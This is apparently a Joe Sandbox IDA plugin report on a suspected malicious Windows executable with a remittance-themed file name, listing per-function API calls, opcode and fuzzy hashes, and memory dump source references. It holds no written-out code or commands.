                                                                      • API String ID: 1795658109-0
                                                                      • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                      • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                      • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                      • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                      • GetCaretPos.USER32(?), ref: 004743B2
                                                                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                      • GetForegroundWindow.USER32 ref: 004743EE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                      • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                      • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                      • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                      APIs
                                                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                      • _wcslen.LIBCMT ref: 00449519
                                                                      • _wcslen.LIBCMT ref: 00449526
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend_wcslen$_wcspbrk
                                                                      • String ID:
                                                                      • API String ID: 2886238975-0
                                                                      • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                      • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                      • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                      • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __setmode$DebugOutputString_fprintf
                                                                      • String ID:
                                                                      • API String ID: 1792727568-0
                                                                      • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                      • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                      • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                      • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                      APIs
                                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$AttributesLayered
                                                                      • String ID:
                                                                      • API String ID: 2169480361-0
                                                                      • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                      • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                      • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                      • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                      APIs
                                                                        • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                        • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                        • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                      • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                      • String ID: cdecl
                                                                      • API String ID: 3850814276-3896280584
                                                                      • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                      • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                      • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                      • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                      APIs
                                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                      • _memmove.LIBCMT ref: 0046D475
                                                                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 2502553879-0
                                                                      • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                      • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                      • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                      • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                      APIs
                                                                      • SendMessageW.USER32 ref: 00448C69
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                      • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                      • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                      • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                      • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                      APIs
                                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastacceptselect
                                                                      • String ID:
                                                                      • API String ID: 385091864-0
                                                                      • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                      • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                      • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                      • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                      • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                      • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                      • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                      • GetStockObject.GDI32(00000011), ref: 00430258
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateMessageObjectSendShowStock
                                                                      • String ID:
                                                                      • API String ID: 1358664141-0
                                                                      • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                      • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                      • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                      • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                      • String ID:
                                                                      • API String ID: 2880819207-0
                                                                      • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                      • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                      • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                      • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                      • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                      • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                      • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                      • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                      • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                      • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                      APIs
                                                                      • __wsplitpath.LIBCMT ref: 0043392E
                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                      • __wsplitpath.LIBCMT ref: 00433950
                                                                      • __wcsicoll.LIBCMT ref: 00433974
                                                                      • __wcsicoll.LIBCMT ref: 0043398A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                      • String ID:
                                                                      • API String ID: 1187119602-0
                                                                      • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                      • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                      • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                      • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1597257046-0
                                                                      • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                                      • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                      • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                                      • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                      • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
